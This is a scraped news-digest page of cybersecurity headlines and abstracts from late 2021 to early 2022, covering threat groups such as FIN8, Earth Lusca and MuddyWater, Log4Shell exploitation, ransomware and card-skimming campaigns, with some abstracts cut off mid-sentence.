The financially motivated FIN8 actor , in all likelihood, has resurfaced with a never-before-seen ransomware strain called " White Rabbit " that was recently deployed against a local bank in the U.S. in December 2021. That's according to new findings published by Trend Micro, calling out the malware's overlaps with Egregor, which was taken down by Ukrainian law enforcement authorities in February 2021. "One of the most notable aspects of White Rabbit's attack is how its payload binary requires a specific command-line password to decrypt its internal configuration and proceed with its ransomware routine," the researchers noted . "This method of hiding malicious activity is a trick that the ransomware family Egregor uses to hide malware techniques from analysis." Egregor, which commenced operations in September 2020 until its operations took a huge hit, is widely believed to be a reincarnation of Maze , which shut down its criminal enterpThe Hacker News
January 18, 2022
Financially motivated Earth Lusca threat actors targets organizations worldwide Full Text
Abstract
A sophisticated threat actor, tracked as Earth Lusca, is targeting government and private organizations worldwide as for financial purposes. Trend Micro researchers spotted an elusive threat actor, called Earth Lusca, that targets organizations worldwide...Security Affairs
January 18, 2022
USCYBERCOM Links MuddyWater to Iranian Intelligence Agency Full Text
Abstract
MuddyWater, aka Seedworm, is an Iranian cyberespionage threat actor that primarily targets the UAE, Saudi Arabia, Israel, Iraq, and other Middle Eastern nations, as well as some European and North American countries.Cyware Alerts - Hacker News
January 18, 2022
Earth Lusca Hackers Aimed at High-Value Targets in Government and Private Sectors Full Text
Abstract
An elusive threat actor called Earth Lusca has been observed striking organizations across the world as part of what appears to be simultaneously an espionage campaign and an attempt to reap monetary profits. "The list of its victims includes high-value targets such as government and educational institutions, religious movements, pro-democracy and human rights organizations in Hong Kong, COVID-19 research organizations, and the media, amongst others," Trend Micro researchers said in a new report. "However, the threat actor also seems to be financially motivated, as it also took aim at gambling and cryptocurrency companies. The cybersecurity firm attributed the group as part of the larger China-based Winnti cluster , which refers to a number of linked groups rather than a single discrete entity that are focused on intelligence gathering and intellectual property theft. Earth Lusca's intrusion routes are facilitated by spear-phishing and watering hole attacksThe Hacker News
January 17, 2022
Earth Lusca Employs Doraemon, ShadowPad and Winnti Malware to Target Organizations in Hong Kong Full Text
Abstract
The group’s primary motivation seems to be cyberespionage: the list of its victims includes high value targets in Hong Kong, COVID-19 research organizations, and the media, among others.Trend Micro
January 14, 2022
FIN7 Targeting U.S. Businesses with BadUSB Devices Full Text
Abstract
The FBI is alerting U.S. organizations about the rise in BadUSB attacks, by the Fin7 threat actor group, that deliver ransomware to unsuspecting organizations. Plugging the USB drives into computers registers the drive as a keyboard and sends a series of automated pre-configured keystrokes. T ... Read MoreCyware Alerts - Hacker News
January 13, 2022
GootLoader Hackers Targeting Employees of Law and Accounting Firms Full Text
Abstract
Operators of the GootLoader campaign are setting their sights on employees of accounting and law firms as part of a fresh onslaught of widespread cyberattacks to deploy malware on infected systems, an indication that the adversary is expanding its focus to other high-value targets. "GootLoader is a stealthy initial access malware, which after getting a foothold into the victim's computer system, infects the system with ransomware or other lethal malware," researchers from eSentire said in a report shared with The Hacker News. The cybersecurity services provider said it intercepted and dismantled intrusions aimed at three law firms and an accounting enterprise. The names of the victims were not disclosed. Malware can be delivered on targets' systems via many methods, including poisoned search results, fake updates, and trojanized applications downloaded from sites linking to pirated software. GootLoader resorts to the first technique. In March 2021, details emThe Hacker News
January 13, 2022
Researchers Decrypted Qakbot Banking Trojan’s Encrypted Registry Keys Full Text
Abstract
Cybersecurity researchers have decoded the mechanism by which the versatile Qakbot banking trojan handles the insertion of encrypted configuration data into the Windows Registry . Qakbot, also known as QBot, QuackBot and Pinkslipbot, has been observed in the wild since 2007. Although mainly fashioned as an information-stealing malware, Qakbot has since shifted its goals and acquired new functionality to deliver post-compromise attack platforms such as Cobalt Strike Beacon, with the final objective of loading ransomware on infected machines. "It has been continually developed, with new capabilities introduced such as lateral movement, the ability to exfiltrate email and browser data, and to install additional malware," Trustwave researchers Lloyd Macrohon and Rodel Mendrez said in a report shared with The Hacker News. In recent months, phishing campaigns have culminated in the distribution of a new loader called SQUIRRELWAFFLE , which acts as a channel to retrieveThe Hacker News
January 13, 2022
Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor Full Text
Abstract
An Iranian state-sponsored actor has been observed scanning and attempting to abuse the Log4Shell flaw in publicly-exposed Java applications to deploy a hitherto undocumented PowerShell-based modular backdoor dubbed " CharmPower " for follow-on post-exploitation. "The actor's attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on previous infrastructure, which made the attack easier to detect and attribute," researchers from Check Point said in a report published this week. The Israeli cybersecurity company linked the attack to a group known as APT35 , which is also tracked using the codenames Charming Kitten, Phosphorus, and TA453, citing overlaps with toolsets previously identified as infrastructure used by the threat actor. Log4Shell aka CVE-2021-44228 (CVSS score: 10.0) concerns a critical security vulnerability in the popular Log4j logging library that, if successfully exploiteThe Hacker News
January 12, 2022
Hackers Use Cloud Services to Distribute Nanocore, Netwire, and AsyncRAT Malware Full Text
Abstract
Threat actors are actively incorporating public cloud services from Amazon and Microsoft into their malicious campaigns to deliver commodity remote access trojans (RATs) such as Nanocore , Netwire , and AsyncRAT to siphon sensitive information from compromised systems. The spear-phishing attacks, which commenced in October 2021, have primarily targeted entities located in the U.S., Canada, Italy, and Singapore, researchers from Cisco Talos said in a report shared with The Hacker News. Using existing infrastructure to facilitate intrusions is increasingly becoming part of an attacker's playbook as it obviates the need to host their own servers, not to mention using it as a cloaking mechanism to evade detection by security solutions. In recent months, collaboration and communication tools like Discord, Slack, and Telegram have found a place in many an infection chain to commandeer and exfiltrate data from the victim machines. Viewed in that light, the abuse of cloud plaThe Hacker News
January 12, 2022
US links MuddyWater hacking group to Iranian intelligence agency Full Text
Abstract
US Cyber Command (USCYBERCOM) has officially linked the Iranian-backed MuddyWatter hacking group to Iran's Ministry of Intelligence and Security (MOIS).BleepingComputer
January 12, 2022
Russia-linked threat actors targets critical infrastructure, US authorities warn Full Text
Abstract
US authorities warn critical infrastructure operators of the threat of cyberattacks orchestrated by Russia-linked threat actors. US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National...Security Affairs
January 12, 2022
OceanLotus hackers turn to web archive files to deploy backdoors Full Text
Abstract
The OceanLotus group of state-sponsored hackers are now using the web archive file format (.MHT and .MHTML) to deploy backdoors to compromised systems.BleepingComputer
January 11, 2022
State hackers use new PowerShell backdoor in Log4j attacks Full Text
Abstract
Hackers believed to be part of the Iranian APT35 state-backed group (aka 'Charming Kitten' or 'Phosphorus') has been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor.BleepingComputer
January 10, 2022
Oops: Cyberspies infect themselves with their own malware Full Text
Abstract
After infecting themselves with their own custom remote access trojan (RAT), an Indian-linked cyber-espionage group has accidentally exposed its operations to security researchers.BleepingComputer
January 9, 2022
Microsoft and the FTC Say Attackers Still Not Done with Log4Shell Full Text
Abstract
Public and private organizations alike, including Microsoft and the U.S. Federal Trade Commission (FTC), are alerting organizations against continuous attacks exploiting Log4Shell since December 2021.Cyware Alerts - Hacker News
January 7, 2022
Aquatic Panda Targets Academic Institutions via Log4Shell Full Text
Abstract
CrowdStrike researchers have found Aquatic Panda threat actors who are abusing Log4Shell exploit tools on a vulnerable VMware installation at large academic institutions. The threat group is known for using tools for maintaining persistence to obtain access to intellectual property and other trade ... Read MoreCyware Alerts - Hacker News
January 7, 2022
FIN7 group continues to target US companies with BadUSB devices Full Text
Abstract
The Federal Bureau of Investigation (FBI) warns US companies that the FIN7 cybercriminals group is targeting the US defense industry with BadUSB devices. The US Federal Bureau of Investigation issued a flash alert to warn that the financially motivated...Security Affairs
January 05, 2022
Researchers Uncover Hacker Group Behind Organized Financial-Theft Operation Full Text
Abstract
Cybersecurity researchers have taken the wraps of an organized financial-theft operation undertaken by a discreet actor to target transaction processing systems and siphon funds from entities primarily located in Latin America for at least four years. The malicious hacking group has been codenamed Elephant Beetle by Israeli incident response firm Sygnia, with the intrusions aimed at banks and retail companies by injecting fraudulent transactions among benign activity to slip under the radar after an extensive study of the targets' financial structures. "The attack is relentless in its ingenious simplicity serving as an ideal tactic to hide in plain sight, without any need to develop exploits," the researchers said in a report shared with The Hacker News, calling out the group's overlaps with another tracked by Mandiant as FIN13 , an "industrious" threat actor linked to data theft and ransomware attacks in Mexico stretching back as early as 2016. EleThe Hacker News
January 5, 2022
Threat actors continue to exploit Log4j flaws in their attacks, Microsoft Warns Full Text
Abstract
Threat actors continue to attempt to exploit Apache Log4J vulnerabilities in their campaigns to deploy malware on target systems, Microsoft warns. Microsoft is warning of continuing attempts by nation-state actors and cybercriminals to exploit recently...Security Affairs
January 04, 2022
Hackers use video player to steal credit cards from over 100 sites Full Text
Abstract
Hackers used a cloud video hosting service to perform a supply chain attack on over one hundred real estate sites that injected malicious scripts to steal information inputted in website forms.BleepingComputer
January 4, 2022
North Korean Konni Hacker Group Targets Russian Diplomats Using New Year Greetings Full Text
Abstract
The attacks have been linked to a threat actor known as Konni, and have been taking place since at least December 20, cybersecurity firm Cluster25 said in a report published on Monday.The Record
December 30, 2021
Chinese Hacker Group Uses Log4j Exploit to Target Academic Institution Full Text
Abstract
A Chinese hacker group known for industrial espionage and intelligence collection used a vulnerability in Log4j to go after a large academic institution, researchers at CrowdStrike revealed Wednesday.Cyberscoop
December 29, 2021
Threat Actor Uses Novel HP iLO Rootkit to Wipe Servers Full Text
Abstract
An Iranian cybersecurity firm said it discovered a novel rootkit that hides inside the firmware of HP iLO devices and which has been used in real-world attacks to wipe servers of Iranian entities.The Record
December 28, 2021
Experts Detail Logging Tool of DanderSpritz Framework Used by Equation Group Hackers Full Text
Abstract
Cybersecurity researchers have offered a detailed glimpse into a system called DoubleFeature that's dedicated to logging the different stages of post-exploitation stemming from the deployment of DanderSpritz, a full-featured malware framework used by the Equation Group . DanderSpritz came to light on April 14, 2017, when a hacking group known as the Shadow Brokers leaked the exploit tool, among others, under a dispatch titled " Lost in Translation ." Also included in the leaks was EternalBlue , a cyberattack exploit developed by the U.S. National Security Agency (NSA) that enabled threat actors to carry out the NotPetya ransomware attack on unpatched Windows computers. The tool is a modular, stealthy, and fully functional framework that relies on dozens of plugins for post-exploitation activities on Windows and Linux hosts. DoubleFeature is one among them, which functions as a "diagnostic tool for victim machines carrying DanderSpritz," researchers fromThe Hacker News
December 28, 2021
New Flagpro malware linked to Chinese state-backed hackers Full Text
Abstract
The cyber-espionage APT (advanced persistent threat) group tracked as 'BlackTech' was spotted using a novel malware called 'Flagpro' in attacks against Japanese firms.BleepingComputer
December 28, 2021
Threat Actors Abuse MSBuild for Cobalt Strike Beacon Execution Full Text
Abstract
The malicious MSBuild project used by cybercriminals in recent attacks was designed to compile and execute specific C# code that in turn decodes and executes Cobalt Strike.Security Week
December 27, 2021
PECB Certified Lead Ethical Hacker: Take Your Career to the Next Level Full Text
Abstract
Cybercrime is increasing exponentially and presents devastating risks for most organizations. According to Cybercrime Magazine, global cybercrime damage is predicted to hit $10.5 trillion annually as of 2025. One of the more recent and increasingly popular forms of tackling such issues by identifying is ethical hacking. This method identifies potential security vulnerabilities in its early stages. Certified ethical hackers use advanced tools and strategies to prevent cyberattacks and help organizations strengthen their cybersecurity. Why Companies Should Hire Ethical Hackers As cyberattacks constantly evolve and improve, organizations must ensure that their defense systems and approach can keep up with the level and complexity of cyberattacks. In today's business era, organizations cannot afford to operate without identifying the vulnerabilities in their system and taking preventive measures. As such, ethical hackers provide several advantages: they offer a unique outsider's perspThe Hacker News
December 22, 2021
PYSA Emerges as Top Ransomware Actor in November Full Text
Abstract
Overtaking the Conti ransomware gang, PYSA finds success with government-sector attacks.Threatpost
December 22, 2021
Researchers Disclose Unpatched Vulnerabilities in Microsoft Teams Software Full Text
Abstract
Microsoft said it won't be fixing or is pushing patches to a later date for three of the four security flaws uncovered in its Teams business communication platform earlier this March. The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could "allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and DoS'ing their Teams app/channels." Of the four vulnerabilities, Microsoft is said to have addressed only one that results in IP address leakage from Android devices, with the tech giant noting that a fix for the denial-of-service (DoS) flaw will be considered in a future version of the product. The issues were responsibly disclosed to the company on March 10, 2021. Chief among the flaws is a server-side request forgery ( SSRF ) vulnerability in the endpoint "/urlpThe Hacker News
December 22, 2021
Evil Corp Wears REvil’s Garb to Hide Itself Full Text
Abstract
In a classic impersonation tactic, the Evil Corp group is now believed to be identifying itself as REvil to avoid sanctions imposed on it by the U.S. government. Even after several attempts of rebranding as a different malware, researchers were able to associate the malware easily with Evil Corp. ... Read MoreCyware Alerts - Hacker News
December 21, 2021
Tropic Trooper Cyber Espionage Hackers Targeting Transportation Sector Full Text
Abstract
Transportation industry and government agencies related to the sector are the victims of an ongoing campaign since July 2020 by a sophisticated and well-equipped cyberespionage group in what appears to be yet another uptick in malicious activities that are "just the tip of the iceberg." "The group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories)," Trend Micro researchers Nick Dai, Ted Lee, and Vickie Su said in a report published last week. Earth Centaur, also known by the monikers Pirate Panda and Tropic Trooper, is a long-running threat group focused on information theft and espionage that has led targeted campaigns against government, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong dating all the way back to 2011. The hostile agents, believed to be a Chinese-speaking actor, are knoThe Hacker News
December 21, 2021
Iranian Charming Kitten Enters Israeli Networks via Log4Shell Full Text
Abstract
Check Point researchers observed communications between a server used by the Charming Kitten group and targets in Israel. The group is actively taking advantage of a recently disclosed vulnerability in Log4j to carry out attacks.Cyware Alerts - Hacker News
December 20, 2021
Nation-state actors are exploiting Zoho zero-day CVE-2021-44515 since October, FBI warns Full Text
Abstract
The FBI warns that zero-day flaw in Zoho's ManageEngine Desktop Central has been under active exploitation by nation-state actors since October. The Federal Bureau of Investigation (FBI) revealed that the critical CVE-2021-44515 zero-day vulnerability...Security Affairs
December 18, 2021
Trend Micro Spots Chinese Hackers Targeting Transportation Sector Full Text
Abstract
Since the middle of 2020, a Chinese state-sponsored threat actor called 'Tropic Trooper' has been targeting transportation organizations and government entities related to the transportation sector, Trend Micro reports.Security Week
December 17, 2021
New Report Sheds Light on Earth Centaur Activities Full Text
Abstract
Researchers uncovered details about the Earth Centaur group that has been targeting transportation firms and government agencies associated with transportation. The report suggests that the group attempts to access some internal documents and personal information that may be used in future attacks ... Read MoreCyware Alerts - Hacker News
December 16, 2021
‘Tropic Trooper’ Reemerges to Target Transportation Outfits Full Text
Abstract
Analysts warn that the attack group, now known as ‘Earth Centaur,’ is honing its attacks to go after transportation and government agencies.Threatpost
December 16, 2021
Multiple Nation-State actors are exploiting Log4Shell flaw Full Text
Abstract
Nation-state actors from China, Iran, North Korea, and Turkey are attempting to exploit the Log4Shell vulnerability to in attacks in the wild. Microsoft researchers reported that Nation-state actors from China, Iran, North Korea, and Turkey are now abusing...Security Affairs
December 15, 2021
Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges Full Text
Abstract
Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware. The new vulnerability, assigned the identifier CVE-2021-45046 , makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0. "This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and GabrielThe Hacker News
December 15, 2021
Seedworm Targeting Telecom, IT, and Utility firms in the Middle East and Asia Full Text
Abstract
Symantec revealed that the Iranian MuddyWater group has been targeting telecom operators, IT firms, and a utility company in the Middle East and other parts of Asia. Researchers observed that the attackers made a deliberate attempt to target more and more organizations by mounting a supply-chain at ... Read MoreCyware Alerts - Hacker News
December 15, 2021
China, Iran among those exploiting Apache cyber vulnerability, researchers say Full Text
Abstract
State-sponsored hackers from countries including Iran and China are actively exploiting a major vulnerability in Apache logging package log4j to target vulnerable organizations around the world, security researchers found this week.The Hill
December 15, 2021
Hackers Using Malicious IIS Server Module to Steal Microsoft Exchange Credentials Full Text
Abstract
Malicious actors are deploying a previously undiscovered binary, an Internet Information Services ( IIS ) webserver module dubbed " Owowa ," on Microsoft Exchange Outlook Web Access servers with the goal of stealing credentials and enabling remote command execution. "Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange's Outlook Web Access (OWA)," Kaspersky researchers Paul Rascagneres and Pierre Delcher said . "When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server." The idea that a rogue IIS module can be fashioned as a backdoor is not new. In August 2021, Slovak cybersecurity company ESET's study of the IIS landscape revealed as many as 14 malware families that were developed as native IIS modules in an attempt to intercept HTTP trafficThe Hacker News
December 15, 2021
State-sponsored hackers abuse Slack API to steal airline data Full Text
Abstract
A suspected Iranian state-supported threat actor is deploying a newly discovered backdoor named 'Aclip' that abuses the Slack API for covert communications.BleepingComputer
December 15, 2021
Log4j vulnerability now used by state-backed hackers, access brokers Full Text
Abstract
As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Log4j Java-based logging library.BleepingComputer
December 14, 2021
Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware Full Text
Abstract
Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability . The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files. The vulnerability is tracked as CVE-2021-44228 and is also known by the monikers "Log4Shell" or "Logjam." In simple terms, the bug could force an affected system to download malicious software, giving the attackers a digital beachhead on servers located within corporate networks. Log4j is an open-source Java library maintained by the nonprofit Apache Software FThe Hacker News
December 14, 2021
‘Seedworm’ Attackers Target Telcos in Asia, Middle East Full Text
Abstract
The focused attacks aimed at cyberespionage and lateral movement appear to hint at further ambitions by the group, including supply-chain threats.Threatpost
December 14, 2021
Hackers steal Microsoft Exchange credentials using IIS module Full Text
Abstract
Threat actors are installing a malicious IIS web server module named 'Owowa' on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely.BleepingComputer
December 13, 2021
Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group Full Text
Abstract
A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021. The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, Accenture's Cyber Investigations, Forensics and Response (CIFR) team said in a report published on December 10. "The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach," the CIFR team said . "Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment." 95% of the known victims are based in North America, while the remaining 5% are inThe Hacker News
December 13, 2021
Hacker Poses As Support Rep to Breach Cox Communications Full Text
Abstract
The impacted data includes the Cox account number, access PIN, security questions and answers, list of active Cox services, Cox.net email address, name, address, and phone number of many customers.Forbes
December 12, 2021
Hackers start pushing malware in worldwide Log4Shell attacks Full Text
Abstract
Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article we compiled the known payloads, scans, and attacks using the Log4j vulnerability.BleepingComputer
December 10, 2021
New ‘Karakurt’ hacking group focuses on data theft and extortion Full Text
Abstract
A sophisticated cybercrime group known as 'Karakurt' who has been quietly working from the shadows has had its tactics and procedures exposed by researchers who tracked recent cyberattacks conducted by the hackers.BleepingComputer
December 9, 2021
Microsoft Seizes Malicious Domains Used by Nickel Full Text
Abstract
The Nickel group was using several malicious domains for intelligence gathering from multiple government agencies, think tanks, and human rights organizations worldwide.Cyware Alerts - Hacker News
December 9, 2021
Crooks injects e-skimmers in random WordPress plugins of e-stores Full Text
Abstract
Threat actors are injecting credit card swipers into random plugins of e-commerce WordPress sites, Sucuri researchers warn. Sucuri researchers are warning of threat actors injecting credit card swipers into random plugins of e-commerce WordPress sites....Security Affairs
December 9, 2021
KAX17 Runs Rogue Relays to Expose Tor Users Full Text
Abstract
Researchers stumbled across a mischievous threat actor, dubbed KAX17, running over 900 malicious servers allegedly to deanonymize Tor users. Most of the Tor relay servers used by the group were located in data centers worldwide and were configured as entry and middle points. The recent findings sho ... Read MoreCyware Alerts - Hacker News
December 08, 2021
Hackers infect random WordPress plugins to steal credit cards Full Text
Abstract
Credit card swipers are being injected into random plugins of e-commerce WordPress sites, hiding from detection while stealing customer payment details.BleepingComputer
December 08, 2021
XE Group exposed for eight years of hacking, credit card theft Full Text
Abstract
A relatively unknown group of Vietnamese hackers calling themselves 'XE Group' has been linked to eight years of for-profit hacking and credit card skimming.BleepingComputer
December 07, 2021
SolarWinds Hackers Targeting Government and Business Entities Worldwide Full Text
Abstract
Nobelium, the threat actor attributed to the massive SolarWinds supply chain compromise, has been once again linked to a series of attacks targeting multiple cloud solution providers, services, and reseller companies, as the hacking group continues to refine and retool its tactics at an alarming pace in response to public disclosures. The intrusions, which are being tracked by Mandiant under two different activity clusters UNC3004 and UNC2652, are both associated with UNC2452, an uncategorized threat group that has since been tied to the Russian intelligence service. UNC2652, in particular, has been observed targeting diplomatic entities with phishing emails containing HTML attachments with malicious JavaScript, ultimately dropping a Cobalt Strike Beacon onto the infected devices. "In most instances, post compromise activity included theft of data relevant to Russian interests," Mandiant researchers Luke Jenkins, Sarah Hawley, Parnian Najafi, and Doug Bienstock said inThe Hacker News
December 07, 2021
Microsoft Seizes 42 Malicious Web Domains Used By Chinese Hackers Full Text
Abstract
Microsoft on Monday announced the seizure of 42 domains used by a China-based cyber espionage group that set its sights on organizations in the U.S. and 28 other countries pursuant to a legal warrant issued by a federal court in the U.S. state of Virginia. The Redmond company attributed the malicious activities to a group it pursues as Nickel , and by the wider cybersecurity industry under the monikers APT15, Bronze Palace, Ke3Chang, Mirage, Playful Dragon, and Vixen Panda. The advanced persistent threat (APT) actor is believed to have been active since at least 2012. "Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," Microsoft's Corporate Vice President for Customer Security and Trust, Tom Burt, said . "There is often a correlation between Nickel's targets and China's geopolitical intThe Hacker News
December 06, 2021
Russian group behind SolarWinds incident ramping up hacking efforts, analysis says Full Text
Abstract
The Russian government-linked hacking group behind one of the biggest cyber espionage incidents in U.S. history has only intensified its hacking efforts in the year since, research released Monday found.The Hill
December 06, 2021
Microsoft disrupts Chinese hacking group targeting organizations in dozens of countries Full Text
Abstract
Microsoft on Monday announced that a federal court had granted a request to allow the company to seize websites being used by a Chinese based hacking group that were targeting organizations in the United States and 28 other nations.The Hill
December 6, 2021
Threat actors stole more than $150 million worth of cryptocurrency tokens from BitMart platform Full Text
Abstract
Threat actors stole more than $150 million in various cryptocurrencies from the cryptocurrency trading platform BitMart. Cryptocurrency trading platform BitMart has disclosed a security breach, threat actors stole than $150 million in various cryptocurrencies....Security Affairs
December 06, 2021
Russian hacking group uses new stealthy Ceeloader malware Full Text
Abstract
The Nobelium hacking group continues to breach government and enterprise networks worldwide by targeting their cloud and managed service providers and using a new custom "Ceeloader" malware.BleepingComputer
December 6, 2021
Hackers are sending receipts with anti-work messages to businesses’ printers Full Text
Abstract
Hackers are targeting printers of businesses around the world to print ‘anti-work’ slogans pushing workers to demand better pay. Multiple employees are sharing on Twitter and Reddit the images of anti-work messages sent to the printers of their...Security Affairs
December 4, 2021
Hackers steal $120m from Badger Defi and $30m from MonoX Full Text
Abstract
Two DeFi projects BadgerDAO and MonoX are the latest victims of security breaches in which hundreds of millions of dollars worth of cryptocurrency has been stolen by hackers.Hackread
December 03, 2021
Researchers Detail How Pakistani Hackers Targeting Indian and Afghan Governments Full Text
Abstract
A Pakistani threat actor successfully socially engineered a number of ministries in Afghanistan and a shared government computer in India to steal sensitive Google, Twitter, and Facebook credentials from its targets and stealthily obtain access to government portals. Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy , which is so-called because of its attempts to mimic the infection chains associated with another group tracked as SideWinder and mislead attribution. "The lures used by SideCopy APT are usually archive files that have embedded one of these files: LNK, Microsoft Publisher or Trojanized Applications," Malwarebytes researcher Hossein Jazi said , adding the embedded files are tailored to target government and military officials based in Afghanistan and India. The revelation comes close on the heels of disclosures that Meta took steps to block malicious activities carried out by theThe Hacker News
December 3, 2021
KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays Full Text
Abstract
Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users. A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize...Security Affairs
December 02, 2021
Hackers use in-house Zoho ServiceDesk exploit to drop webshells Full Text
Abstract
An advanced persistent threat (APT) group that had been exploiting a flaw in the Zoho ManageEngine ADSelfService Plus software has pivoted to leveraging a different vulnerability in another Zoho product.BleepingComputer
December 01, 2021
Hackers Increasingly Using RTF Template Injection Technique in Phishing Attacks Full Text
Abstract
Three different state-sponsored threat actors aligned with China, India, and Russia have been observed adopting a new method called RTF (aka Rich Text Format) template injection as part of their phishing campaigns to deliver malware to targeted systems. "RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file," Proofpoint researchers said in a new report shared with The Hacker News. At the heart of the attack is an RTF file containing decoy content that can be manipulated to enable the retrieval of content, including malicious payloads, hosted at an external URL upon opening an RTF file. Specifically, it leverages the RTF template functionality to alter a document's formatting properties using a hex editor by specifying a URL resource instead of an accessible file resource destination from which a remote payloadThe Hacker News
December 01, 2021
Hackers targeting and stealing billions from Iranian citizens in texting scheme Full Text
Abstract
Financially motivated hackers likely based in Iran are successfully targeting and stealing billions in currency from Iranian civilians through a texting campaign, new research released Wednesday found.The Hill
November 30, 2021
WIRTE Hacker Group Targets Government, Law, Financial Entities in Middle East Full Text
Abstract
Government, diplomatic entities, military organizations, law firms, and financial institutions primarily located in the Middle East have been targeted as part of a stealthy malware campaign as early as 2019 by making use of malicious Microsoft Excel and Word documents. Russian cybersecurity company Kaspersky attributed the attacks with high confidence to a threat actor named WIRTE, adding the intrusions involved "MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant," which is a Visual Basic Script (VBS) with functionality to amass system information and execute arbitrary code sent by the attackers on the infected machine. An analysis of the campaign as well as the toolset and methods employed by the adversary has also led the researchers to conclude with low confidence that the WIRTE group has connections to another politically motivated collective called the Gaza Cybergang . The affected entities are spread across Armenia, CypThe Hacker News
November 30, 2021
Cyberattackers Slowing Down the Pace of Financial Services Sector Full Text
Abstract
Cyberattackers are launching a number of attacks aimed at the financial sector with the most targeted regions being North and South America, Western Europe, and Southern Asia. One of the most common and frequent attack vectors was phishing, followed by social engineering. Such cyberattacks on the f ... Read MoreCyware Alerts - Hacker News
November 29, 2021
Stealthy WIRTE hackers target governments in the Middle East Full Text
Abstract
A stealthy hacking group named WIRTE has been linked to a government-targeting campaign conducting attacks since at least 2019 using malicious Excel 4.0 macros.BleepingComputer
November 29, 2021
Hackers Using Compromised Google Cloud Accounts to Mine Cryptocurrency Full Text
Abstract
Threat actors are exploiting improperly-secured Google Cloud Platform (GCP) instances to download cryptocurrency mining software to the compromised systems as well as abusing its infrastructure to install ransomware, stage phishing campaigns, and even generate traffic to YouTube videos for view count manipulation. "While cloud customers continue to face a variety of threats across applications and infrastructure, many successful attacks are due to poor hygiene and a lack of basic control implementation," Google's Cybersecurity Action Team (CAT) outlined as part of its recent Threat Horizons report published last week. Of the 50 recently compromised GCP instances, 86% of them were used to conduct cryptocurrency mining, in some cases within 22 seconds of successful breach, while 10% of the instances were exploited to perform scans of other publicly accessible hosts on the Internet to identify vulnerable systems, and 8% of the instances were used to strike other entitiThe Hacker News
November 28, 2021
North Korea-linked Zinc group posed as Samsung recruiters to target security firms Full Text
Abstract
North Korea-linked threat actors posed as Samsung recruiters in a spear-phishing campaign aimed at employees at South Korean security firms. North Korea-linked APT group posed as Samsung recruiters is a spear-phishing campaign that targeted South...Security Affairs
November 27, 2021
Iranian Hackers Abusing Known Bug in Microsoft’s MSHTML Full Text
Abstract
A new Iranian actor was spotted abusing an RCE flaw in Microsoft MSHTML to target Farsi-speaking people globally and stealing their Google and Instagram credentials. The attacks started in July via spear-phishing emails that targeted Windows users with Winword attachments. Exports recommend organiz ... Read MoreCyware Alerts - Hacker News
November 26, 2021
Hackers Targeting Biomanufacturing Facilities With Tardigrade Malware Full Text
Abstract
An advanced persistent threat (APT) has been linked to cyberattacks on two biomanufacturing companies that occurred this year with the help of a custom malware loader called " Tardigrade ." That's according to an advisory published by Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) this week, which noted that the malware is actively spreading across the sector with the likely goal of perpetrating intellectual property theft, maintaining persistence for extended periods of time, and infecting the systems with ransomware. BIO-ISAC, which commenced an investigation following a ransomware attack targeting an unnamed biomanufacturing facility earlier this spring, characterized Tardigrade as a sophisticated piece of malware with "a high degree of autonomy as well as metamorphic capabilities." The same malware was then used to strike a second entity in October 2021. The "actively spreading" intrusions have not been attributed to a specificThe Hacker News
November 26, 2021
Crypto Hackers Using Babadeda Crypter to Make Their Malware Undetectable Full Text
Abstract
